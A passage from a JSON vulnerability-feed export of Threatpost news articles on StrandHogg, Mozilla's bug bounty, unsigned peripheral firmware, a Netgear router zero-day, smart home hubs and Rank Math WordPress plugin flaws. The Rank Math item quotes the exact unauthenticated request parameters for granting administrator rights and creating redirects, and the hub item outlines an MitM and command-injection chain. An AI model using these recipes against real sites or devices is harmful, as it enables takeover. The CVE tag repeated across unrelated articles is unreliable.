these apps have since been removed, dropper apps continue to be published in spite of protections that exist on the store, researchers said. In fact, some are being downloaded millions of times before being spotted and deleted, they said.\n\nIndeed, Google has [struggled mightily](<https://threatpost.com/malicious-app-tallies-100-million-downloads/147748/>) with malware [making its way onto Google Play](<https://threatpost.com/google-play-malicious-apps-racked-up-335m-installs-in-september/148810/>) under its watch and recently has taken [new steps](<https://threatpost.com/google-bad-android-apps/149981/>) to try to alleviate this problem. The discovery of StrandHogg appears to make the need for better security for Android mobile apps all that more urgent.\n\nIndeed, the existence of the vulnerability already being exploited in the wild certainly is troubling, as it means users already likely have been compromised and remain at critical risk, observed Sam Bakken, senior product marketing manager, for digital identity and anti-fraud solution provider [OneSpan](<https://www.onespan.com/>).\n\n\u201cAs you might imagine, criminals salivate over the monetization potential in stolen mobile banking credentials and access to one-time-passwords sent via SMS,\u201d he said in an e-mail to Threatpost. \u201cPromon\u2019s recent findings make the vulnerability as severe as it\u2019s ever been.\u201d\n\nThere is some good news in all of this, Bakken said. Security solutions do exist \u201cunder the umbrella of in-app protection\u201d that can protect devices from malware exploiting StrandHogg, including \u201capp shielding and runtime protection [that] make it easier for app developers to mitigate these windows of exposure resulting from security issues in both Android and iOS,\u201d he said.\n\n**[Free Threatpost Webinar:](<https://attendee.gotowebinar.com/register/7725318633369800449?source=art>)** _**Risk around third-party vendors is real and can lead to data disasters. We rely on third-party vendors, but that doesn\u2019t mean forfeiting security. [Join us on Dec. 18th at 2 pm EST](<https://attendee.gotowebinar.com/register/7725318633369800449?source=art>) as Threatpost looks at managing third-party relationship risks with industry experts Dr. Larry Ponemon, of Ponemon Institute; Harlan Carvey, with Digital Guardian and Flashpoint\u2019s Lance James. [Click here to register](<https://attendee.gotowebinar.com/register/7725318633369800449?source=art>).**_\n", "cvss3": {}, "published": "2019-12-03T13:26:14", "type": "threatpost", "title": "\u2018StrandHogg\u2019 Vulnerability Allows Malware to Pose as Legitimate Android Apps", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-5135"], "modified": "2019-12-03T13:26:14", "id": "THREATPOST:B9E2C282835BF652ABC49052C859DBCC", "href": "https://threatpost.com/strandhogg-vulnerability-allows-malware-to-pose-as-legitimate-android-apps/150750/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2020-10-15T22:28:43", "description": "Mozilla is bumping up its bug bounty payouts and has added new websites and services \u2013 including the recently deployed [Firefox Monitor](<https://threatpost.com/mozilla-announces-firefox-monitor-tool-testing-firefox-61/133087/>)\u2013 to its bug bounty program in hopes of attracting more researchers to sniff out vulnerabilities.\n\nThe browser-maker is doubling bug bounty payouts for most of its in-scope sites and services, as well as tripling payouts for the highest bug classification in its program, remote code execution vulnerabilities. Researchers can now [bring in $15,000](<https://www.mozilla.org/en-US/security/web-bug-bounty/>) for RCE flaws on \u201ccritical websites\u201d (sites and services considered critical to Mozilla operations, which pay out at the highest bounty rate) and $5,000 for \u201ccore websites\u201d (which pay out bounties, but at a reduced rate).\n\n\u201cMozilla was one of the first companies to establish a bug bounty program and we continually adjust it so that it stays as relevant now as it always has been,\u201d said Simon Bennetts with Mozilla [in a Tuesday announcement](<https://blog.mozilla.org/security/2019/11/19/updates-to-the-mozilla-web-security-bounty-program/>). \u201cTo celebrate the 15 years of the 1.0 release of Firefox, we are making significant enhancements to the web bug bounty program.\u201d\n\n[](<https://threatpost.com/newsletter-sign/>)\n\nIn addition, Mozilla announced that over the past six months, it has added new in-scope \u201ccritical websites\u201d and services for its program. This includes:\n\n * [Autograph](<https://github.com/mozilla-services/autograph>) \u2013 a cryptographic signature service that signs Mozilla products.\n * [Lando](<https://moz-conduit.readthedocs.io/en/latest/lando-user.html>) \u2013 Mozilla\u2019s automatic code-landing service which allows users to commit Phabricator revisions to their destination repository.\n * [Phabricator](<https://wiki.mozilla.org/Phabricator>) \u2013 a code management tool used for reviewing Firefox code changes.\n * [Taskcluster](<https://docs.taskcluster.net/docs>) the task execution framework that supports Mozilla\u2019s continuous integration and release processes.\n\nMozilla has also offered new Core sites to its program \u2013 including Firefox Monitor, a site where users can register their email address so that they can be informed if their account details are part of a data breach. Firefox Monitor, which made waves after it was announced in 2018 on the heels of Mozilla\u2019s partnership with Cloudflare and Have I Been Pwned (HIBP), went into [testing earlier this year](<https://threatpost.com/mozilla-announces-firefox-monitor-tool-testing-firefox-61/133087/>) and has since been released.\n\nOther added \u201ccore\u201d websites that are now in-scope include:\n\n * [Localization](<https://mozilla-l10n.github.io/localizer-documentation/>) \u2013 a service contributors can use to help localize Mozilla products.\n * [Payment Subscription](<https://github.com/mozilla/subhub>) \u2013 a service that is used as the interface in front of the payment provide (Stripe).\n * [Firefox Private Network](<https://private-network.firefox.com/>) \u2013 a site from which users can download a desktop extension that helps secure and protect connections everywhere Firefox is used.\n * [Ship It](<https://wiki.mozilla.org/ReleaseEngineering/Applications/Ship_It>) \u2013 a system that accepts requests for releases from humans and translates them into information and requests that Mozilla\u2019s Buildbot-based release automation can process.\n * [Speak To Me](<https://github.com/mozilla/speech-proxy>) \u2013 Mozilla\u2019s Speech Recognition API.\n\nMozilla has continually increased rewards for bug bounty vulnerabilities over the years \u2013 the last time [being in 2015](<https://threatpost.com/mozilla-bug-bounty-payouts-going-up/113264/>). Mozilla started its [web bounty program](<https://threatpost.com/behind-numbers-mozillas-bug-bounty-program-092811/75701/>) in December 2010 and offered rewards of up to $3,000 for certain kinds of vulnerabilities reported in those sites.\n\n_**Is MFA enough to protect modern enterprises in the peak era of data breaches? How can you truly secure consumer accounts? Prevent account takeover? Find out: Catch our free, on-demand **_[_**Threatpost webinar**_](<https://attendee.gotowebinar.com/register/3127445778613605890?source=post>)_**, \u201cTrends in Fortune 1000 Breach Exposure\u201d to hear advice from breach expert Chip Witt of SpyCloud. **_[_**Click here to register**_](<https://attendee.gotowebinar.com/register/3127445778613605890?source=post>)_**.**_\n\n**Share this article:**\n\n * [Editor's Picks](<https://threatpost.com/category/editors-picks/>)\n * [Web Security](<https://threatpost.com/category/web-security/>)\n", "cvss3": {}, "published": "2019-11-20T21:04:32", "type": "threatpost", "title": "Mozilla Bug Bounty Program Doubles Payouts, Adds Firefox Monitor", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-5135"], "modified": "2019-11-20T21:04:32", "id": "THREATPOST:BED35CFCFED307909DB60602551982A6", "href": "https://threatpost.com/mozilla-bug-bounty-program-doubles-payouts-adds-firefox-monitor/150489/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2020-10-14T22:30:12", "description": "Fresh firmware vulnerabilities in Wi-Fi adapters, USB hubs, trackpads and cameras are putting millions of peripheral devices in danger of a range of cyberattacks, according to research from Eclypsium.\n\nTouchPad and TrackPoint firmware in Lenovo Laptops, HP Wide Vision FHD camera firmware in HP laptops and the Wi-Fi adapter on Dell XPS laptops were all found to lack secure firmware update mechanisms with proper code-signing.\n\n\u201cSoftware and network vulnerabilities are often the more-obvious focus of organizations\u2019 security priorities, but firmware vulnerabilities could give adversaries full control over the compromised device,\u201d Katie Teitler, senior analyst at TAG Cyber, said via email. \u201cThis could lead to implanted backdoors, network traffic sniffing, data exfiltration and more. Unfortunately, though, firmware vulnerabilities can be harder to detect and more difficult to patch.\u201d\n\n## Unsigned Firmware Updates: A Growing Problem\n\nFirmware for peripherals can be burned into the integrated circuit of the device itself, or the component may have its own flash memory where firmware is stored. Firmware can also be dynamically provided by the operating system at boot time. Regardless of the implementation approach, firmware is used as the device-specific operating system for the peripheral in question, and can provide criminals with a rich attack surface if found to be vulnerable.\n\n[](<https://threatpost.com/newsletter-sign/>)\n\n\u201cMany peripheral devices do not verify that firmware is properly signed with a high-quality public/private key before running the code,\u201d explained researchers at Eclypsium, in vulnerability research [released on Tuesday](<https://eclypsium.com/2020/2/18/unsigned-peripheral-firmware/>). \u201cThis means that these components have no way to validate that the firmware loaded by the device is authentic and should be trusted. An attacker could simply insert a malicious or vulnerable firmware image, which the component would blindly trust and run.\u201d\n\nThe scenario for an attack is thus a simple one. First, an attacker gains access to a device via any method, be it physical access, malware that allows remote code execution and so on, and, with basic user privileges, the attacker can write malicious firmware to a vulnerable component. If the component doesn\u2019t require the firmware to be properly signed, the attacker\u2019s code is loaded. Depending on the peripheral in question, this can lead to a range of malicious activity.\n\n\u201cFor example, malicious firmware on a network adapter could allow an attacker to sniff, copy, redirect or alter traffic leading to a loss of data, man-in-the-middle and other attacks,\u201d according to the research. \u201cPCI-based devices could enable [Direct Memory Access (DMA) attacks](<https://threatpost.com/dell-hp-memory-access-bugskernel-privileges/152369/>) that could easily steal data or take full control over the victim system. Cameras could be used to capture data from the user\u2019s environment, while a compromised hard drive could allow the attacker to hide code and tools without being seen by the operating system.\u201d\n\nFurther, firmware attacks allow malicious activity to fly under the radar of endpoint protections; as recently seen in the [latest campaigns using the RobbinHood ransomware](<https://threatpost.com/byo-bug-windows-kernel-outdated-driver/152762/>), vulnerable drivers can be used to bypass security protections and enable ransomware to attack without interference.\n\nJesse Michael, principal researcher at Eclypsium, told Threatpost that the kinds of attacks that these bugs enable are not insignificant. For instance, the Black Energy attack that brought down part of the power grid in Ukraine used an unsigned firmware update to break serial-to-Ethernet adapters that were used to control relays.\n\n\u201cA similar incident occurred with Saudi Aramco,\u201d he said. \u201cThis made the system much harder to bring back online.\u201d He added that firmware-based attacks have seen a 7.5-time increase in firmware/hardware CVEs from three years ago.\n\n## New Vulnerabilities\n\nEclypsium researchers analyzed a Lenovo ThinkPad X1 Carbon 6th Gen laptop, which contains two vulnerable firmware mechanisms: Touchpad firmware (pr2812761-tm3288-011-0808.img) and TrackPoint firmware (PSG5E5_RANKA_fv06.bin).\n\n\u201cWe discovered that the Touchpad and TrackPoint use insecure firmware update mechanisms,\u201d according to the research. \u201cSpecifically, cryptographic signature verification was not required at the device level before firmware updates were applied. This lack of control made it possible to modify the firmware images through software to run arbitrary malicious code within these components.\u201d\n\nMeanwhile, the firmware updates distributed by HP for the HP Wide Vision FHD camera found in the HP Spectre x360 Convertible 13-ap0xxx laptop are unencrypted and lack authenticity checks, Eclypsium noted. The device\u2019s firmware updater is composed of SunplusIT\u2019s Windows-based firmware update tool along with the firmware image, and both have issues.\n\n\u201cThe firmware image does not include any form of cryptographic signature or other authenticity information,\u201d according to the report. \u201cThe Windows-based firmware update tool accepts firmware files that have been modified to adjust USB descriptor contents. This ability to modify USB descriptors can be leveraged to disable the device or cause it to be identified as a different type of USB device. Once additional details of the processor architecture are discovered, the camera module behavior can be altered to be malicious.\u201d\n\nAlso, the SunplusIT firmware updater can successfully update a device even as a normal user, rather than requiring administrator access \u2013 a violation of best practices.\n\nEclypsium researchers also found that the firmware of the Wi-Fi adapter on Dell XPS 15 9560 laptops running Windows 10 has a bug. While Windows 10 will confirm that the drivers are correctly signed, that\u2019s where the security checks stop. So, if the drivers are correctly signed, a small certificate icon is displayed next to the driver when viewed in the device manager. If they aren\u2019t correctly signed, a user can still successfully load them \u2013 the icon merely goes away. This means that a privileged attacker could easily replace driver files.\n\nAnd finally, the researchers also took a look at the Linux Vendor Firmware Service, which is a secure portal that allows hardware vendors to upload firmware updates. An analysis showed multiple insecure updates and drivers.\n\n\u201cFrom this resource we can focus specifically on update protocols and easily review which are signed and which are not,\u201d the researchers wrote. \u201cWhile we can see that some of the update protocols are related to transport, many others are protocols used for the actual update process. For example, VLI USB Hub firmware is unsigned.\u201d\n\n## Vendor Response\n\nEclypsium researchers notified HP of the webcam firmware vulnerability on August 4, and Lenovo of the TouchPad/TrackPoint vulnerability on Lenovo on June 13.\n\n\u201cWe expect some vendors will issue CVEs, but none have as of yet,\u201d Jesse Michael, principal researcher at Eclypsium, told Threatpost. \u201cFor these peripherals, the OEMs (HP and Lenovo) have to work with their suppliers to develop fixes. From what we\u2019ve seen, most of these existing components were initially designed to have unsigned firmware, making them inherently vulnerable. Our interactions with these OEMs lead us to expect that future systems will have firmware update authentication requirements built in.\u201d\n\nEclypsium also reported the Wi-Fi issue to both Qualcomm, who provides the chipset and driver for the wireless card, and to Microsoft, which checks that such drivers are signed.\n\n\u201cQualcomm responded that their chipset is subordinate to the processor, and that the software running on the CPU is expected to take responsibility for validating firmware,\u201d Michael said. \u201cThey stated that there was no plan to add signature verification for these chips. However, Microsoft responded that it was up to the device vendor to verify firmware that is loaded into the device.\u201d The result is that this will likely go unaddressed, since each is pointing the responsibility back to the other.\n\nBottom line: Unsigned firmware in peripheral devices remains a highly overlooked aspect of cybersecurity, and provides multiple pathways for malicious actors to compromise laptops and servers.\n\n\u201cOnce firmware on any of these components is infected, the malware stays undetected by any software security controls,\u201d Michael said. \u201cDespite previous in-the-wild attacks, peripheral manufacturers have been slow to adopt the practice of signing firmware, leaving millions of Windows and Linux systems at risk of firmware attacks that can exfiltrate data, disrupt operations and deliver ransomware.\u201d\n\n**_Learn how Operational Technology and Information Technology systems are merging and changing security playbooks in this free Threatpost Webinar. Join us _**[**_Wednesday, Feb. 19 at 2 p.m. ET_**](<https://attendee.gotowebinar.com/register/2652328115100076035?source=art>)**_ when a panel of OT and IT security experts will discuss how this growing trend is shaping security approaches for IoT and 5G rollouts. This webinar is for security and DevOps engineers, IoT edge developers and security executives._**\n", "cvss3": {}, "published": "2020-02-18T11:00:08", "type": "threatpost", "title": "Lenovo, HP, Dell Peripherals Face Unpatched Firmware Bugs", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-5135"], "modified": "2020-02-18T11:00:08", "id": "THREATPOST:815A85AC4471792F2F220EAD5DD49460", "href": "https://threatpost.com/lenovo-hp-dell-peripherals-unpatched-firmware/152936/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2020-10-14T22:23:48", "description": "UPDATED\n\nResearchers this week said they discovered an unpatched, zero-day vulnerability in firmware for [Netgear](<https://www.netgear.com/>) routers that put [79 device models](<https://www.bleepingcomputer.com/news/security/79-netgear-router-models-risk-full-takeover-due-to-unpatched-bug/>) at risk for full takeover, they said.\n\nNetgear has since issued several hot fixes, [available here](<https://kb.netgear.com/000061982/Security-Advisory-for-Multiple-Vulnerabilities-on-Some-Routers-Mobile-Routers-Modems-Gateways-and-Extenders>).\n\nThe flaw, a memory-safety issue present in the firmware\u2019s httpd web server, allows attackers to bypass authentication on affected installations of Netgear routers, according to two separate reports: [One on the Zero Day Initiative](<https://www.zerodayinitiative.com/advisories/ZDI-20-712/>) (ZDI) by a researcher called \u201cd4rkn3ss\u201d from the Vietnam Posts and Telecommunications Group; and a separate [blog post](<https://blog.grimm-co.com/2020/06/soho-device-exploitation.html>) by Adam Nichols of cybersecurity firm [Grimm](<https://blog.grimm-co.com/>).\n\n\u201cThe specific flaw exists within the httpd service, which listens on TCP Port 80 by default,\u201d according to the ZDI report, which covers the bug\u2019s presence in the R6700 series Netgear routers. \u201cThe issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a fixed-length, stack-based buffer.\u201d\n\n[](<https://threatpost.com/newsletter-sign/>)\n\nAuthentication is not required to exploit the vulnerability, which attackers can use to gain root privileges, according to the report.\n\nZDI said it informed Netgear of the vulnerability in January. The vendor had asked for an extension until the end of June for public disclosure, which ZDI declined.\n\nFor his part, Nichols discovered the flaw initially in the Netgear R7000 router series, but eventually identified 79 different Netgear devices and 758 firmware images that included a vulnerable copy of the web server.\n\n\u201cThis vulnerability affects firmwares as early as 2007 (WGT624v4, version 2.0.6),\u201d he said in his post. \u201cGiven the large number of firmware images, manually finding the appropriate gadgets is infeasible. Rather, this is a good opportunity to automate gadget detection.\u201d\n\nNichols said that the problem lies in lack of support for a feature called [stack cookies](<https://en.wikipedia.org/wiki/Stack_buffer_overflow#Stack_canaries>), or stack canaries\u2014a reference to the use of a \u201ccanary in a coal mine\u201d\u2013which are used to detect a stack buffer overflow before execution of malicious code can occur, he explained. While some Netgear routers support this feature \u2013 namely, the D8500 firmware version 1.0.3.29 and the R6300v2 firmware versions 1.0.4.12-1.0.4.20 \u2013 most others do not, he said.\n\n\u201cLater versions of the D8500 and R6300v2 stopped using stack cookies, making this vulnerability once again exploitable,\u201d Nichols explained in the post. \u201cThis is just one more example of how SOHO device security has fallen behind as compared to other modern software.\u201d\n\nWeb servers in the firmware of SOHO devices in general are often the most vulnerable aspect of the system as they \u201cmust parse user input from the network and run complex CGI functions that use that input,\u201d he said.\n\n\u201cFurthermore, the web server is written in C and has had very little testing, and thus it is often vulnerable to trivial memory-corruption bugs,\u201d Nichols said.\n\n## **Exploitation**\n\nThe zero-day vulnerability can be exploited in two ways, Nichols explained in his post. One way to is to exploit the recv function used in the http parser in the web server through a series of steps that eventually lead to a stack-buffer overflow.\n\nAttackers also can use a cross-site request forgery (CSRF) attack to exploit the vulnerability, though he or she needs to know the model and version of the router they\u2019re targeting to pull this off successfully, he explained.\n\n\u201cIf a user with a vulnerable router browses to a malicious website, that website could exploit the user\u2019s router \u2026 by serving an HTML page which sends an AJAX request containing the exploit to the target device:\u201d Nichols said. \u201cHowever, as the CSRF web page cannot read any responses from the target server, it is not possible to remotely fingerprint the device.\u201d\n\nOne mitigation for the vulnerability is to restrict interaction with the service to trusted machines, according to the ZDI report.\n\n\u201cOnly the clients and servers that have a legitimate procedural relationship with the service should be permitted to communicate with it,\u201d according to the report. \u201cThis could be accomplished in a number of ways, most notably with firewall rules/whitelisting.\u201d\n\nIn March, [Netgear patched](<https://threatpost.com/critical-netgear-bug-impacts-nighthawk-router/153445/>) a critical remote code execution bug that could allow an unauthenticated attacker to take control of its Wireless AC Router Nighthawk (R7800) hardware running firmware versions prior to 1.0.2.68. It also addressed two high-severity bugs impacting Nighthawk routers, 21 medium-severity flaws and one rated low.\n\n_**This story was updated June 25, 2000 at 11:30 a.m. ET to include information on Netgear\u2019s hot fixes.**_\n\n**_Insider threats are different in the work-from home era. On _**[**_June 24 at 2 p.m. ET_**](<https://attendee.gotowebinar.com/register/3265005683762389007?source=ART>)**_, join the Threatpost edit team and our special guest, Gurucul CEO Saryu Nayyer, for a FREE webinar, \u201c_**_**The Enemy Within: How Insider Threats Are Changing.\u201d **_**_Get helpful, real-world information on how insider threats are changing with WFH, what the new attack vectors are and what companies can do about it_**_**. **_[**_Please register here_**](<https://attendee.gotowebinar.com/register/3265005683762389007?source=ART>)**_ for this Threatpost webinar._**\n", "cvss3": {}, "published": "2020-06-19T13:05:37", "type": "threatpost", "title": "Netgear Zero-Day Allows Full Takeover of Dozens of Router Models", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-5135"], "modified": "2020-06-19T13:05:37", "id": "THREATPOST:DF35DF449CB3A8F93C405B227A00E117", "href": "https://threatpost.com/netgear-zero-day-takeover-routers/156744/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2020-10-14T22:26:19", "description": "Three different connected home hubs \u2013 Fibaro Home Center Lite, Homematic Central Control Unit (CCU2) and Elko\u2019s eLAN-RF-003 \u2013 are vulnerable in their older versions to serious bugs that would allow information disclosure, man-in-the-middle (MiTM) attacks and unauthenticated remote code execution (RCE), according to researchers.\n\nHome hubs are used to connect a range of smart devices (including appliances, IP cameras, smart thermostat and doorbell gadgets, connected TVs, Google Home and Amazon Alexa offerings, plus laptops, phones and the like). Researchers at ESET pointed out in [Tuesday research](<https://www.welivesecurity.com/2020/04/22/serious-flaws-smart-home-hubs-is-your-device-among-them/>) that an attacker that compromises one of these could in theory gain full access to all of the peripheral devices connected to it \u2013 a scenario that could also impact businesses given that more people are working from home.\n\n[](<https://attendee.gotowebinar.com/register/4136632530104301068?source=art>)\n\nThe flaws were disclosed by ESET just this week, though most of them were fixed in previous updates. They still impact a number of IoT devices, the analyst firm said \u2013 likely because consumers don\u2019t tend to update their device firmware very often, if at all; and, a handful of the flaws remain unaddressed.\n\n**Fibaro Home Center Lite**\n\nFibaro Home Center Lite (firmware version 4.170) was found by the ESET IoT research team to be vulnerable to a range of bugs. The problems included TLS connections that were vulnerable to MitM attacks thanks to a missing certificate validation \u2013 which would open the door to command injection; the use of very short, hardcoded password stored in the file /etc/shadow in the device\u2019s firmware, ripe for brute-forcing; the use of a hardcoded password salt; and a vulnerable weather service API that leaked the exact GPS coordinates of the device due to the use of unencrypted HTTP communications.\n\nSome of these could be chained together to create an SSH backdoor for full control of a targeted device.\n\nFor instance, ESET researchers were able to create their own MiTM server, thanks to the fact that the Fibaro Home Center Lite communicates with its cloud server via a standard SSH tunnel, but it fails to validate the certificate for TLS communications with the server.\n\n\u201cFibaro Home Center Lite sends two separate TLS-encrypted requests asking for the SSH server\u2019s hostname and listening port,\u201d the researchers explained. \u201cBased on the information returned, Fibaro Home Center Lite creates a secured connection via an SSH tunnel to the specified SSH server.\u201d\n\nBecause of the failure to perform certificate verification on the TLS requests, any attacker can use fake certificates signed by their proxy server to accept the public key of the targeted device and mimic the original Fibaro server.\n\n\u201cTo make matters worse, intercepted TLS requests \u2013 intended to create the SSH tunnel between the device and the legitimate server \u2013 are vulnerable to command injection,\u201d according to the research. \u201cBy using the MitM server, attackers can replace the address of the original server lb-1.eu.ra.fibaro.com with whatever they wish.\u201d\n\nFor example, the attacker can generate a malicious response with a command injection that causes the device\u2019s initialization shell script to fail. That prompts the device to request the server\u2019s IP address once again \u2013 a request that can now be intercepted by the attacker and replaced with a different tunnel.\n\n\u201cAnother tunnel is created, through which the attacker\u2019s SSH backdoor port is forwarded,\u201d according to the analysis. \u201cThis reroutes the communication from both ports (SSH 666, HTTP 80) to the attacker\u2019s MitM server. From this point on, the attacker has root access to Fibaro Home Center Lite.\u201d\n\nFrom there, attackers can intercept firmware updates and uncover the hardcoded root password, valid for all Fibaro Home Center Lite devices \u2013 can be \u201ctrivially brute-forced,\u201d according to the security firm.\n\nAttackers can also manipulate user credentials for the device\u2019s web interface, stored in an SQLite database on Fibaro Home Center Lite.\n\n\u201cThese passwords are stored SHA-1 hashed, created from the supplied password salted with a hardcoded string that can easily be extracted from a script in the firmware image file,\u201d the analysis detailed. \u201cUsing the salt, an attacker can rewrite existing credentials in the appropriate row of the Home Center Lite\u2019s SQLite database located at /mnt/user_data/db, rendering the legitimate password invalid.\u201d\n\nFibaro issued patches for the issues, so that the home hubs now verify server certificates and disallow command injections; and the hardcoded root password has been replaced with a \u201clonger and more secure alternative,\u201d according to ESET.\n\nThe hardcoded salt string used to create the SHA-1 hash of the password is however a lingering issue.\n\n**Homematic Central Control Unit (CCU2)**\n\nThe Homematic CCU2 (firmware version 2.31.25) harbors a bug that would allow unauthenticated remote code execution (RCE) as a root user.\n\nThe issue arises from a common gateway interface (CGI) script that handles the logout procedure of the Homematic CCU2\u2019s web-based administration interface.\n\n\u201cThe $sid (session ID) parameter was not properly escaped, enabling an attacker to inject malicious code and run arbitrary shell commands as the root (administrator) user,\u201d according to the research. \u201cAs the logout script did not check that it is processing a request from a currently logged-in session, an unlimited number of these requests could be made by an attacker without ever having to log into the device.\u201d\n\nUsing this, an attacker could set a new root password.\n\nThe issue has been patched.\n\n**Elko\u2019s eLAN-RF-003**\n\nThe eLAN-RF-003 (firmware version 2.9.079) is a smart RF box that allows user to control a variety of systems such as lighting, hot-water temperature, heating, smart locks, shutters, blinds, fans, power outlets and more via an application installed on a smartphone.\n\nESET uncovered critical vulnerabilities in the hub, including the use of unencrypted HTTP protocol for the box\u2019s web GUI communication; essentially, all user communications \u2013 including sensitive data such as usernames and passwords \u2013 was sent over the network without encryption or any other form of protection, allowing any attacker to intercept the information in the clear.\n\nAlso at issue: Inadequate authentication, allowing all commands to be executed without requesting a login; a lack of session cookies, thus lacking any mechanism that could verify that the user was correctly logged in; and, peripheral devices connected to the smart RF box were vulnerable to record and replay attacks.\n\n\u201cUnauthenticated access to the web interface is a severe issue, as it gives anyone with access to the local network the ability to take control over the smart RF box and subsequently all the devices connected to it,\u201d according to the analysis. \u201cThis is especially worrying due to possible combination with other vulnerabilities that allow the attacker to gain a foothold in the local Wi-Fi network.\u201d\n\nAttackers would be able to extract information about peripheral devices, floor plans, errors, attributes of the managed smart home, the device\u2019s firmware version, and so on, ESET noted.\n\nUnfortunately, two of reported vulnerabilities (the unencrypted web interface communication and insecure radio frequency (RF) communication) appear to have remained unpatched, while only partial patches were issue for the others, ESET said. That said, the researchers haven\u2019t probed the latest generation of the device.\n\nThreatpost has reached out to the vendors for further comment.\n\n\u201cMost of the flaws disclosed by ESET have been fixed by the vendors of these particular devices,\u201d the researchers concluded. \u201cHowever, some of the issues appear to have been left unresolved, at least on older generations of devices. Even if newer, more secure generations are available, though, the older ones are still in operation\u2026.[security vulnerabilities in IoT devices](<https://threatpost.com/half-iot-devices-vulnerable-severe-attacks/153609/>) are a prevalent issue.\u201d\n\n**_Worried about your cloud security in the work-from-home era? On _****_April 23 at 2 p.m. ET_****_, join DivvyCloud and Threatpost for a FREE webinar, _**[**_A Practical Guide to Securing the Cloud in the Face of Crisis_**](<https://attendee.gotowebinar.com/register/4136632530104301068?source=art>)**_. Get exclusive research insights and critical, advanced takeaways on how to avoid cloud disruption and chaos in the face of COVID-19 \u2013 and during all times of crisis. _**[**_Please register here_**](<https://attendee.gotowebinar.com/register/4136632530104301068?source=art>)_** for this sponsored webinar.**_\n", "cvss3": {}, "published": "2020-04-22T18:28:23", "type": "threatpost", "title": "Connected Home Hubs Open Houses to Full Remote Takeover", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-5135"], "modified": "2020-04-22T18:28:23", "id": "THREATPOST:FB79AC722601BBB92388FFC66EE0EAF4", "href": "https://threatpost.com/connected-home-hubs-full-remote-takeover/155037/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2020-10-14T22:26:52", "description": "A pair of security vulnerabilities in the WordPress search engine optimization (SEO) plugin, known as Rank Math, could allow remote cybercriminals to elevate privileges and install malicious redirects onto a target site, according to researchers. It\u2019s a WordPress plugin with more than 200,000 installations.\n\nAccording to researchers with Wordfence, one of the flaws is critical (10 out of 10 on the CVSSv3 vulnerability severity scale). It could allow an unauthenticated attacker to update arbitrary metadata. This can be abused to grant or revoke administrative privileges for any registered user on the site.\n\nThe second vulnerability is characterized as high-severity (7.4 on the severity scale) and could enable an unauthenticated attacker to create redirects from almost any location on the site to any destination of their choice.\n\n[](<https://threatpost.com/newsletter-sign/>)\n\nWordfence disclosed the bugs to the developer of the add-on on March 24 (its full name is \u201cWordPress SEO Plugin \u2013 Rank Math\u201d) \u2013 and CVE tracking numbers are forthcoming, researchers said, [in an analysis](<https://www.wordfence.com/blog/2020/03/critical-vulnerabilities-affecting-over-200000-sites-patched-in-rank-math-seo-plugin/>) released Tuesday. A patch is now available in the latest version, 1.0.41.1, so Web administrators should update their sites.\n\n**Critical Metadata Flaw**\n\nRank Math allows users to update the metadata on website posts \u2013 which is where the bug lies, according to a technical analysis published on Tuesday by Wordfence.\n\nThe plugin registers a REST-API endpoint, rankmath/v1/updateMeta, the firm explained in its breakdown. This calls a function called \u201cupdate_metadata,\u201d which could be used to update the slug on existing posts, or could be used to delete or update metadata for posts, comments and terms. This endpoint also allows for updating metadata for users.\n\nThe issue is that in non-patched versions, the endpoint fails to include a permissions check on users making changes.\n\n\u201cWordPress user permissions are stored in the usermeta table, which meant that an unauthenticated attacker could grant any registered user administrative privileges by sending a $_POST request to wp-json/rankmath/v1/updateMeta, with an objectID parameter set to the User ID to be modified, an objectType parameter set to user, a meta[wp_user_level] parameter set to 10, and a meta[wp_capabilities][administrator] parameter set to 1,\u201d the analysis noted.\n\nA nefarious type could also completely revoke an existing administrator\u2019s privileges by sending a similar request with a meta[wp_user_level] parameter and a meta[wp_capabilities] parameter set to empty values, the researchers added, effectively locking administrators out of their own sites.\n\n\u201cNote that these attacks are only the most critical possibilities. Depending on the other plugins installed on a site, the ability to update post, term and comment metadata could potentially be used for many other exploits such as cross-site scripting (XSS),\u201d the researchers commented.\n\n**Malicious Redirect Bonanza**\n\nThe Rank Math plugin also comes with an optional module that can be used to create redirects on a site. An administrator might do this to direct visitors away from pages under construction, for example.\n\nIn order to add this feature, the plugin registers a REST-API endpoint for this too, called \u201crankmath/v1/updateRedirection.\u201d And, like the other vulnerability, this endpoint fails to execute a permissions check, according to Wordfence \u2013 which means that an attacker could easily create new redirects or modify existing redirects. As such, the attack could essentially be used to prevent access to almost all of a site\u2019s existing content, according to the analysis, by simply redirecting visitors to a malicious site.\n\n\u201cIn order to perform this attack, an unauthenticated attacker could send a $_POST request to rankmath/v1/updateRedirection with a redirectionUrl parameter set to the location they wanted the redirect to go to, a redirectionSources parameter set to the location to redirect from, and a hasRedirect parameter set to true,\u201d Wordfence researchers wrote.\n\nThere is, however, a caveat that accounts for the lower-severity rating of the bug: \u201cThe redirect could not be set to an existing file or folder on the server, including the site\u2019s main page,\u201d according to the analysis. \u201cThis limited the damage to some extent in that, while an attacker could create a redirect from most locations on the site, including new locations, or any existing post or page other than the homepage, they could not redirect visitors immediately upon accessing the site.\u201d\n\nWeb admins can mitigate the issues by building in a \u201cpermission_callback\u201d on any REST-API endpoints, or by updating to the latest version of the plug-in.\n\nWordPress plugins continue to make headlines as weak links that can lead to website compromises. For instance, in March, a critical vulnerability in a WordPress plugin known as \u201cThemeREX Addons\u201d [was found](<https://threatpost.com/themerex-wordpress-plugin-remote-code-execution/153592/>) that could open the door for remote code execution in 44,000 websites.\n\nAlso in March, two vulnerabilities \u2013 including a high-severity flaw \u2013 [were patched](<https://threatpost.com/wordpress-plugin-bug-popup-builder/153715/>) in a popular WordPress plugin called Popup Builder. The more severe flaw could enable an unauthenticated attacker to infect malicious JavaScript into a popup \u2013 potentially opening up more than 100,000 websites to takeover.\n\nIn February, popular WordPress plugin Duplicator, which has more than 1 million active installations, [was discovered to have](<https://www.wordfence.com/blog/2020/03/zero-day-vulnerability-in-themerex-addons-now-patched/>) 